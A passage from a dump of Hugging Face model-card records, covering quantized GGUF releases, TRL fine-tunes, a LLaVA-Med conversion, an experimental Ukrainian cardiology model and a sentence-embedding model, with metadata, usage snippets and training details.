*Provides a way for people who have updates to the Model Card, suggestions, or questions, to contact the Model Card authors.*
-->
|
mradermacher/Mistral-Nemo-Instruct-2407-DPO-S1K-Merged-GGUF
|
mradermacher
| 2025-09-23T12:28:54Z | 26 | 1 |
transformers
|
[
"transformers",
"gguf",
"en",
"base_model:brendanartley/Mistral-Nemo-Instruct-2407-DPO-S1K-Merged",
"base_model:quantized:brendanartley/Mistral-Nemo-Instruct-2407-DPO-S1K-Merged",
"endpoints_compatible",
"region:us",
"conversational"
] | null | 2025-09-22T09:18:25Z |
---
base_model: brendanartley/Mistral-Nemo-Instruct-2407-DPO-S1K-Merged
language:
- en
library_name: transformers
mradermacher:
readme_rev: 1
quantized_by: mradermacher
tags: []
---
## About
<!-- ### quantize_version: 2 -->
<!-- ### output_tensor_quantised: 1 -->
<!-- ### convert_type: hf -->
<!-- ### vocab_type: -->
<!-- ### tags: -->
<!-- ### quants: x-f16 Q4_K_S Q2_K Q8_0 Q6_K Q3_K_M Q3_K_S Q3_K_L Q4_K_M Q5_K_S Q5_K_M IQ4_XS -->
<!-- ### quants_skip: -->
<!-- ### skip_mmproj: -->
static quants of https://huggingface.co/brendanartley/Mistral-Nemo-Instruct-2407-DPO-S1K-Merged
<!-- provided-files -->
***For a convenient overview and download list, visit our [model page for this model](https://hf.tst.eu/model#Mistral-Nemo-Instruct-2407-DPO-S1K-Merged-GGUF).***
weighted/imatrix quants seem not to be available (by me) at this time. If they do not show up a week or so after the static ones, I have probably not planned for them. Feel free to request them by opening a Community Discussion.
## Usage
If you are unsure how to use GGUF files, refer to one of [TheBloke's
READMEs](https://huggingface.co/TheBloke/KafkaLM-70B-German-V0.1-GGUF) for
more details, including on how to concatenate multi-part files.
## Provided Quants
(sorted by size, not necessarily quality. IQ-quants are often preferable over similar sized non-IQ quants)
| Link | Type | Size/GB | Notes |
|:-----|:-----|--------:|:------|
| [GGUF](https://huggingface.co/mradermacher/Mistral-Nemo-Instruct-2407-DPO-S1K-Merged-GGUF/resolve/main/Mistral-Nemo-Instruct-2407-DPO-S1K-Merged.Q2_K.gguf) | Q2_K | 4.9 | |
| [GGUF](https://huggingface.co/mradermacher/Mistral-Nemo-Instruct-2407-DPO-S1K-Merged-GGUF/resolve/main/Mistral-Nemo-Instruct-2407-DPO-S1K-Merged.Q4_K_S.gguf) | Q4_K_S | 7.2 | fast, recommended |
| [GGUF](https://huggingface.co/mradermacher/Mistral-Nemo-Instruct-2407-DPO-S1K-Merged-GGUF/resolve/main/Mistral-Nemo-Instruct-2407-DPO-S1K-Merged.Q6_K.gguf) | Q6_K | 10.2 | very good quality |
| [GGUF](https://huggingface.co/mradermacher/Mistral-Nemo-Instruct-2407-DPO-S1K-Merged-GGUF/resolve/main/Mistral-Nemo-Instruct-2407-DPO-S1K-Merged.Q8_0.gguf) | Q8_0 | 13.1 | fast, best quality |
Here is a handy graph by ikawrakow comparing some lower-quality quant
types (lower is better):

And here are Artefact2's thoughts on the matter:
https://gist.github.com/Artefact2/b5f810600771265fc1e39442288e8ec9
## FAQ / Model Request
See https://huggingface.co/mradermacher/model_requests for some answers to
questions you might have and/or if you want some other model quantized.
## Thanks
I thank my company, [nethype GmbH](https://www.nethype.de/), for letting
me use its servers and providing upgrades to my workstation to enable
this work in my free time.
<!-- end -->
|
marshallhamzah/EchoPath
|
marshallhamzah
| 2025-09-23T12:25:58Z | 0 | 0 |
diffusers
|
[
"diffusers",
"safetensors",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T12:12:49Z |
---
license: apache-2.0
---
|
ChenWu98/numina_qwen_2.5_0.5b_sft_teachers_no_reasoning_source_split_0_2048_0.25
|
ChenWu98
| 2025-09-23T12:25:37Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"generated_from_trainer",
"trl",
"sft",
"base_model:Qwen/Qwen2.5-0.5B",
"base_model:finetune:Qwen/Qwen2.5-0.5B",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T12:24:46Z |
---
base_model: Qwen/Qwen2.5-0.5B
library_name: transformers
model_name: numina_qwen_2.5_0.5b_sft_teachers_no_reasoning_source_split_0_2048_0.25
tags:
- generated_from_trainer
- trl
- sft
licence: license
---
# Model Card for numina_qwen_2.5_0.5b_sft_teachers_no_reasoning_source_split_0_2048_0.25
This model is a fine-tuned version of [Qwen/Qwen2.5-0.5B](https://huggingface.co/Qwen/Qwen2.5-0.5B).
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="None", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
[<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/chenwu/huggingface/runs/hldn54mn)
This model was trained with SFT.
### Framework versions
- TRL: 0.19.1
- Transformers: 4.51.1
- Pytorch: 2.7.0
- Datasets: 4.0.0
- Tokenizers: 0.21.4
## Citations
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
```
|
chaoyinshe/llava-med-v1.5-mistral-7b-hf
|
chaoyinshe
| 2025-09-23T12:24:15Z | 160 | 1 | null |
[
"safetensors",
"llava",
"medical",
"biology",
"visual-question-answering",
"en",
"base_model:microsoft/llava-med-v1.5-mistral-7b",
"base_model:finetune:microsoft/llava-med-v1.5-mistral-7b",
"license:apache-2.0",
"region:us"
] |
visual-question-answering
| 2025-08-21T09:25:44Z |
---
license: apache-2.0
base_model:
- microsoft/llava-med-v1.5-mistral-7b
new_version: microsoft/llava-med-v1.5-mistral-7b
pipeline_tag: visual-question-answering
language:
- en
tags:
- medical
- biology
---
# llava-med-v1.5-mistral-7b-hf
This repository contains a **drop-in, Hugging Face–compatible** checkpoint converted from
[https://huggingface.co/microsoft/llava-med-v1.5-mistral-7b](https://huggingface.co/microsoft/llava-med-v1.5-mistral-7b).
You can load it with the **exact same code** you use for the original model—no extra conversion steps required.
---
## Quick Start
```python
from transformers import LlavaForConditionalGeneration, AutoProcessor
import torch
model_path = "chaoyinshe/llava-med-v1.5-mistral-7b-hf"
model = LlavaForConditionalGeneration.from_pretrained(
model_path,
torch_dtype=torch.bfloat16,
attn_implementation="flash_attention_2", # requires FA2
device_map="auto" # multi-GPU ready
)
processor = AutoProcessor.from_pretrained(model_path)
# Example inference
messages = [
{
"role": "user",
"content": [
{"type": "image"},
{"type": "text", "text": "What is the main finding in this chest X-ray?"}
]
}
]
prompt = processor.tokenizer.apply_chat_template(
messages, tokenize=False, add_generation_prompt=True
)
inputs = processor(
images=[image], text=prompt, return_tensors="pt"
).to(model.device, torch.bfloat16)
with torch.inference_mode():
out = model.generate(**inputs, max_new_tokens=256)
print(processor.decode(out[0], skip_special_tokens=True))
|
fpadovani/cds_replace_word_stanza_verb_51
|
fpadovani
| 2025-09-23T12:22:48Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"gpt2",
"text-generation",
"generated_from_trainer",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-09-23T11:59:11Z |
---
library_name: transformers
tags:
- generated_from_trainer
model-index:
- name: cds_replace_word_stanza_verb_51
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# cds_replace_word_stanza_verb_51
This model is a fine-tuned version of [](https://huggingface.co/) on an unknown dataset.
It achieves the following results on the evaluation set:
- Loss: 3.3397
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 0.0001
- train_batch_size: 256
- eval_batch_size: 256
- seed: 51
- optimizer: Use adamw_torch_fused with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments
- lr_scheduler_type: linear
- lr_scheduler_warmup_steps: 200
- num_epochs: 5
- mixed_precision_training: Native AMP
### Training results
| Training Loss | Epoch | Step | Validation Loss |
|:-------------:|:-----:|:----:|:---------------:|
| No log | 1.0 | 499 | 3.5965 |
| 4.2131 | 2.0 | 998 | 3.4521 |
| 3.2298 | 3.0 | 1497 | 3.3883 |
| 3.0936 | 4.0 | 1996 | 3.3526 |
| 3.0121 | 5.0 | 2495 | 3.3397 |
### Framework versions
- Transformers 4.56.1
- Pytorch 2.8.0+cu128
- Datasets 4.0.0
- Tokenizers 0.22.0
|
vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT-PKU-SafeRLHF-OMWU-0.01-mnt64-0922195521-epoch-7
|
vectorzhou
| 2025-09-23T12:21:35Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"gemma2",
"text-generation",
"generated_from_trainer",
"fine-tuned",
"trl",
"extra-gradient",
"conversational",
"dataset:PKU-Alignment/PKU-SafeRLHF",
"arxiv:2503.08942",
"base_model:vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT",
"base_model:finetune:vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-09-23T11:10:22Z |
---
base_model: vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT
datasets: PKU-Alignment/PKU-SafeRLHF
library_name: transformers
model_name: gemma-2-2b-it-alpaca-cleaned-SFT-PKU-SafeRLHF-OMWU-0.01-mnt64
tags:
- generated_from_trainer
- text-generation
- fine-tuned
- trl
- extra-gradient
licence: license
---
# Model Card for gemma-2-2b-it-alpaca-cleaned-SFT-PKU-SafeRLHF-OMWU-0.01-mnt64
This model is a fine-tuned version of [vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT](https://huggingface.co/vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT) on the [PKU-Alignment/PKU-SafeRLHF](https://huggingface.co/datasets/PKU-Alignment/PKU-SafeRLHF) dataset.
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT-PKU-SafeRLHF-OMWU-0.01-mnt64-0922195521-epoch-7", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
[<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/zrl_csl_nlhf/nlhf/runs/09vdah42)
This model was trained with Extragradient, a method introduced in [Extragradient Preference Optimization (EGPO): Beyond Last-Iterate Convergence for Nash Learning from Human Feedback](https://huggingface.co/papers/2503.08942).
### Framework versions
- TRL: 0.23.0
- Transformers: 4.56.2
- Pytorch: 2.8.0+cu128
- Datasets: 4.1.1
- Tokenizers: 0.22.1
## Citations
Cite Extragradient as:
```bibtex
@misc{zhou2025extragradientpreferenceoptimizationegpo,
title={Extragradient Preference Optimization (EGPO): Beyond Last-Iterate Convergence for Nash Learning from Human Feedback},
author={Runlong Zhou and Maryam Fazel and Simon S. Du},
year={2025},
eprint={2503.08942},
archivePrefix={arXiv},
primaryClass={cs.LG},
url={https://arxiv.org/abs/2503.08942},
}
```
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
```
|
Neelectric/OLMo-2-1124-7B-Instruct_SFT_alpaca_v00.01
|
Neelectric
| 2025-09-23T12:20:20Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"olmo2",
"text-generation",
"conversational",
"arxiv:1910.09700",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-09-23T12:16:30Z |
---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
|
afnankhth/testooo
|
afnankhth
| 2025-09-23T12:15:20Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"bert",
"text-classification",
"generated_from_trainer",
"base_model:NLP-EXP/QE3",
"base_model:finetune:NLP-EXP/QE3",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] |
text-classification
| 2025-09-23T12:13:09Z |
---
library_name: transformers
base_model: NLP-EXP/QE3
tags:
- generated_from_trainer
metrics:
- accuracy
model-index:
- name: testooo
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# testooo
This model is a fine-tuned version of [NLP-EXP/QE3](https://huggingface.co/NLP-EXP/QE3) on an unknown dataset.
It achieves the following results on the evaluation set:
- Loss: 0.8388
- Accuracy: 0.7021
- Weighted F1: 0.6961
- Macro F1: 0.6648
- Weighted Precision: 0.7042
- Weighted Recall: 0.7021
- F1 Class الإقرار: 0.6610
- F1 Class المواساة: 0.6035
- F1 Class التساؤل: 0.9034
- F1 Class الاقتراح: 0.7249
- F1 Class التشجيع: 0.5890
- F1 Class التمني: 0.7583
- F1 Class أخرى: 0.4135
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 2e-05
- train_batch_size: 16
- eval_batch_size: 16
- seed: 42
- optimizer: Use OptimizerNames.ADAMW_TORCH_FUSED with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments
- lr_scheduler_type: linear
- lr_scheduler_warmup_steps: 100
- num_epochs: 1
### Training results
| Training Loss | Epoch | Step | Validation Loss | Accuracy | Weighted F1 | Macro F1 | Weighted Precision | Weighted Recall | F1 Class الإقرار | F1 Class المواساة | F1 Class التساؤل | F1 Class الاقتراح | F1 Class التشجيع | F1 Class التمني | F1 Class أخرى |
|:-------------:|:-----:|:----:|:---------------:|:--------:|:-----------:|:--------:|:------------------:|:---------------:|:----------------:|:-----------------:|:----------------:|:-----------------:|:----------------:|:---------------:|:-------------:|
| 0.9164 | 1.0 | 494 | 0.8388 | 0.7021 | 0.6961 | 0.6648 | 0.7042 | 0.7021 | 0.6610 | 0.6035 | 0.9034 | 0.7249 | 0.5890 | 0.7583 | 0.4135 |
### Framework versions
- Transformers 4.56.1
- Pytorch 2.8.0+cu126
- Datasets 4.0.0
- Tokenizers 0.22.0
|
poolkiltzn/blockassist-bc-vigilant_alert_tuna_1758629505
|
poolkiltzn
| 2025-09-23T12:13:06Z | 0 | 0 | null |
[
"gensyn",
"blockassist",
"gensyn-blockassist",
"minecraft",
"vigilant alert tuna",
"arxiv:2504.07091",
"region:us"
] | null | 2025-09-23T12:12:51Z |
---
tags:
- gensyn
- blockassist
- gensyn-blockassist
- minecraft
- vigilant alert tuna
---
# Gensyn BlockAssist
Gensyn's BlockAssist is a distributed extension of the paper [AssistanceZero: Scalably Solving Assistance Games](https://arxiv.org/abs/2504.07091).
|
SandLogicTechnologies/Hermes-4-14B-GGUF
|
SandLogicTechnologies
| 2025-09-23T12:13:01Z | 0 | 0 |
transformers
|
[
"transformers",
"gguf",
"Qwen3-14B",
"qwen3",
"hybrid-model",
"chatml",
"function calling",
"Quantization",
"Q4_K_M",
"Q5_K_M",
"tool use",
"json output",
"text-generation",
"en",
"base_model:NousResearch/Hermes-4-14B",
"base_model:quantized:NousResearch/Hermes-4-14B",
"license:apache-2.0",
"endpoints_compatible",
"region:us",
"conversational"
] |
text-generation
| 2025-09-22T11:30:34Z |
---
license: apache-2.0
language:
- en
base_model:
- NousResearch/Hermes-4-14B
pipeline_tag: text-generation
library_name: transformers
tags:
- Qwen3-14B
- qwen3
- hybrid-model
- chatml
- function calling
- Quantization
- Q4_K_M
- Q5_K_M
- tool use
- json output
---
# Quantized Hermes-4-14B Model
This repository provides a quantized GGUF version of the Hermes-4-14B model. The 4-bit and 5-bit quantized variants retains the model’s strengths in advanced reasoning tasks while reducing memory and compute requirements ideal for efficient inference on resource-constrained devices.
## Model Overview
- **Original Model**: Hermes-4-14B
- **Quantized Version**:
- Q4_K_M (4-bit quantization)
- Q5_K_M (5-bit quantization)
- **Architecture**: Decoder-only transformer
- **Base Model**: Qwen3-14B-Base
- **Modalities**: Text only
- **Developer**: Nous Research
- **License**: [Apache 2.0 License](https://huggingface.co/NousResearch/Hermes-4-14B/blob/main/LICENSE)
- **Language**: English
## Quantization Details
### Q4_K_M Version
- Approx. ~50% size reduction
- Lower memory footprint (~8.35 GB)
- Slight performance degradation in complex reasoning scenarios
### Q5_K_M Version
- Approx. ~59% size reduction
- Lower memory footprint (~9.79 GB)
- Better performance retention, recommended when quality is a priority
## Key Features
- Reasoning that is top quality, expressive, improves math, code, STEM, logic, and even creative writing and subjective responses.
- Instruction-following model optimized for multi-turn scientific question answering
- Schema adherence & structured outputs: trained to produce valid JSON for given schemas and to repair malformed objects.
- Much easier to steer and align: extreme improvements on steerability, especially on reduced refusal rates
## Usage Example
Text Inference:
```sh
./llama-cli -hf NousResearch/Hermes-4-14B-Q4_k_m.GGUF -p "Explain the Fourier Transform in simple terms"
```
## Recommended Use Cases
- **Scientific reasoning & STEM domains**: tasks requiring step-by-step logical reasoning, clean structure.
- **Coding & software-related tasks**: code generation, explanation, debugging.
- **Chatbots/Assistants**: where reasoning transparency is important (showing chain of thought).
- **Low-resource deployment / edge inferenc**e: use quantized variants.
## Acknowledgments
These quantized models are based on the original work by the **NousResearch** development team.
Special thanks to:
- The [NousResearch](https://huggingface.co/NousResearch) team for developing and releasing the [Hermes-4-14B](https://huggingface.co/NousResearch/Hermes-4-14B) model.
- **Georgi Gerganov** and the entire [`llama.cpp`](https://github.com/ggerganov/llama.cpp) open-source community for enabling efficient model quantization and inference via the GGUF format.
---
## Contact
For any inquiries or support, please contact us at [email protected] or visit our [Website](https://www.sandlogic.com/).
|
bhaveshsoni0023/gpt-oss-20b-multilingual-reasoner
|
bhaveshsoni0023
| 2025-09-23T12:07:41Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"generated_from_trainer",
"sft",
"trl",
"base_model:openai/gpt-oss-20b",
"base_model:finetune:openai/gpt-oss-20b",
"endpoints_compatible",
"region:us"
] | null | 2025-09-17T22:47:10Z |
---
base_model: openai/gpt-oss-20b
library_name: transformers
model_name: gpt-oss-20b-multilingual-reasoner
tags:
- generated_from_trainer
- sft
- trl
licence: license
---
# Model Card for gpt-oss-20b-multilingual-reasoner
This model is a fine-tuned version of [openai/gpt-oss-20b](https://huggingface.co/openai/gpt-oss-20b).
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="bhaveshsoni0023/gpt-oss-20b-multilingual-reasoner", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
This model was trained with SFT.
### Framework versions
- TRL: 0.23.0
- Transformers: 4.56.2
- Pytorch: 2.8.0.dev20250319+cu128
- Datasets: 4.1.1
- Tokenizers: 0.22.1
## Citations
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
```
|
uaritm/gemma3_1b_med_uk
|
uaritm
| 2025-09-23T12:06:36Z | 2,532 | 1 | null |
[
"safetensors",
"gguf",
"gemma3_text",
"medical",
"cardiology",
"uk",
"base_model:google/gemma-3-1b-it",
"base_model:quantized:google/gemma-3-1b-it",
"license:apache-2.0",
"endpoints_compatible",
"region:us",
"conversational"
] | null | 2025-09-14T19:35:55Z |
---
license: apache-2.0
language:
- uk
base_model:
- google/gemma-3-1b-it
tags:
- medical
- cardiology
---
# Model Information
Summary description and brief definition of inputs and outputs.
# Gemma3 1B Med UK
**⚠️ WARNING: Ethical Agreement Required**
Before using this model, you must read and agree to the [Ethical Use Agreement](ETHICAL_GUIDELINES.md). This model is for research purposes and is not a substitute for professional medical advice.
---
# More about the idea
Every physician knows the challenge of distilling a complex discharge summary into clear, practical recommendations.
It is a process that requires both time and focus, often repeated countless times each day.
The model, which is based on Gemma 3n , was trained (tuned) not on real patient medical records,
but on synthetically generated (12,500 discharge epikrises in Ukrainian), carefully designed to reproduce the structure
and tone of authentic clinical documentation, while ensuring complete anonymity.
These texts were created from artificial templates inspired by anonymized medical records,
ensuring that no personal health data was included. Each synthetic extract was paired with a target field called
“Recommendations,” which allowed the model to learn to produce structured results that resemble how doctors write extracts,
while maintaining strict data confidentiality and ethical integrity.
You can find more information in the article at this link: https://medium.com/@uaritm/the-future-of-medicine-how-neural-networks-are-redefining-clinical-practice-c35760229ad9
# DescriptionGemma
TThe model was trained on medical texts with a cardiological focus. This model is experimental and should not be used under any circumstances to establish a diagnosis or recommend treatment!
For this purpose, please consult a doctor.
# Inputs and outputs
It is necessary to use the template for entering information:
Context length 2048
Input: Text string
The model was trained in chat (messages) format. The structure is usually as follows:
messages = [
{"role": "system", "content": "You are a medical assistant. Based on the discharge summary, return strictly valid JSON: {\"Recommendations\": \"<text>\"}. Text in Ukrainian."},
{"role": "user", "content": "Discharge summary: (Text in Ukrainian)"}
]
Output: Text string
Generated text in response to the input, such as an answer about question
The model output should be strictly JSON, for example:
{"Recommendations": "It is recommended to ... (Text in Ukrainian)"}
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
This modelcard aims to be a base template for new models. It has been generated using [this raw template](https://github.com/huggingface/huggingface_hub/blob/main/src/huggingface_hub/templates/modelcard_template.md?plain=1).
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
### Training Data
Private
## Citing & Authors
@misc{UARITM,
title={sentence-transformers: Semantic similarity of medical texts ukr, kor, eng},
author={Vitaliy Ostashko},
year={2025},
url={https://ai.esemi.org},
}
<!--- Describe where people can find more information -->
|
Caesarisnotasalad/test
|
Caesarisnotasalad
| 2025-09-23T12:06:06Z | 0 | 0 |
sentence-transformers
|
[
"sentence-transformers",
"safetensors",
"bert",
"sentence-similarity",
"feature-extraction",
"dense",
"generated_from_trainer",
"dataset_size:100231",
"loss:CachedMultipleNegativesRankingLoss",
"en",
"dataset:sentence-transformers/natural-questions",
"arxiv:1908.10084",
"arxiv:2101.06983",
"base_model:intfloat/multilingual-e5-small",
"base_model:finetune:intfloat/multilingual-e5-small",
"model-index",
"autotrain_compatible",
"text-embeddings-inference",
"endpoints_compatible",
"region:us"
] |
sentence-similarity
| 2025-09-23T12:05:49Z |
---
language:
- en
tags:
- sentence-transformers
- sentence-similarity
- feature-extraction
- dense
- generated_from_trainer
- dataset_size:100231
- loss:CachedMultipleNegativesRankingLoss
base_model: intfloat/multilingual-e5-small
widget:
- source_sentence: who is born on 29 february in india
sentences:
- 'Morarji Desai Morarji Desai (29 February 1896 – 10 April 1995)[1] was an Indian
independence activist and served between 1977 and 1979 as the 4th Prime Minister
of India and led the government formed by the Janata Party. During his long career
in politics, he held many important posts in government such as: Chief Minister
of Bombay State, Home Minister, Finance Minister and 2nd Deputy Prime Minister
of India. On the international scene, Desai holds international fame for his peace
activism and made efforts to initiate peace between two rival South Asian states,
Pakistan and India[citation needed]. After India''s first nuclear explosion in
1974, Desai helped restore friendly relations with China and Pakistan, and vowed
to avoid armed conflict such as Indo-Pakistani war of 1971. He was also accused
of scaling down the Indian covert operations agency, the R&AW.'
- Blues (Super Rugby) The Blues (formerly known as the Auckland Blues until 2000)
are a professional rugby union team based in Auckland, New Zealand who play in
the Super Rugby competition. Like New Zealand's four other Super Rugby regional
franchises, the Blues were established by the NZRU in 1996. One of the most successful
teams in Super Rugby history, the Blues won the competition in each of its first
two seasons, 1996 and 1997, and again in 2003. Additionally, the team were finalists
in 1998 and semi-finalists in 2007 and 2011. The team is captained by James Parsons
and coached by Tana Umaga.
- 'Bryan Callen Callen played Ricky''s sexually abusive father on The Secret Life
of the American Teenager on ABC Family. He also makes frequent appearances on
Chelsea Lately. He hosted the E! show Bank of Hollywood, and currently appears
as a commentator of The Smoking Gun Presents: World''s Dumbest... on truTV.'
- source_sentence: when was the idaho state capitol building built
sentences:
- Idaho State Capitol Construction of the first portion of the capitol building
began in the summer of 1905, 15 years after Idaho gained statehood. Architects
were John E. Tourtellotte and Charles Hummel. Tourtellotte was a Connecticut native
whose career began in Massachusetts and skyrocketed further when he moved to Boise.
Hummel was a German immigrant who partnered with Tourtellotte in 1903. The final
cost of the building was just over $2 million; it was completed in 1920. The architects
used varied materials to construct the building and their design was inspired
by Classical examples.[2]
- 'Shahada Recitation of the shahādah is the most common statement of faith for
Muslims. In Sunni Islam, it is counted as the first of the Five Pillars of Islam,[9]
while the Shi''i Twelvers and Isma''ilis also have the shahada as among their
pillars of faith.[19] It is whispered by the father into the ear of a newborn
child,[9] and it is whispered into the ear of a dying person.[20] The five canonical
daily prayers each include a recitation of the shahada.[17] Recitation of the
shahada in front of witnesses is also the first and only formal step in conversion
to Islam.[9] This occasion often attracts more than the two required witnesses
and sometimes includes a party-like celebration to welcome the convert into their
new faith.[11] In accordance with the central importance played by the notion
of intention (Arabic: نیّة, niyyah) in Islamic doctrine, the recitation of the
shahada must reflect understanding of its import and heartfelt sincerity.[21][22]
Intention is what differentiates acts of devotion from mundane acts and a simple
reading of the shahada from invoking it as a ritual activity.[21][22]'
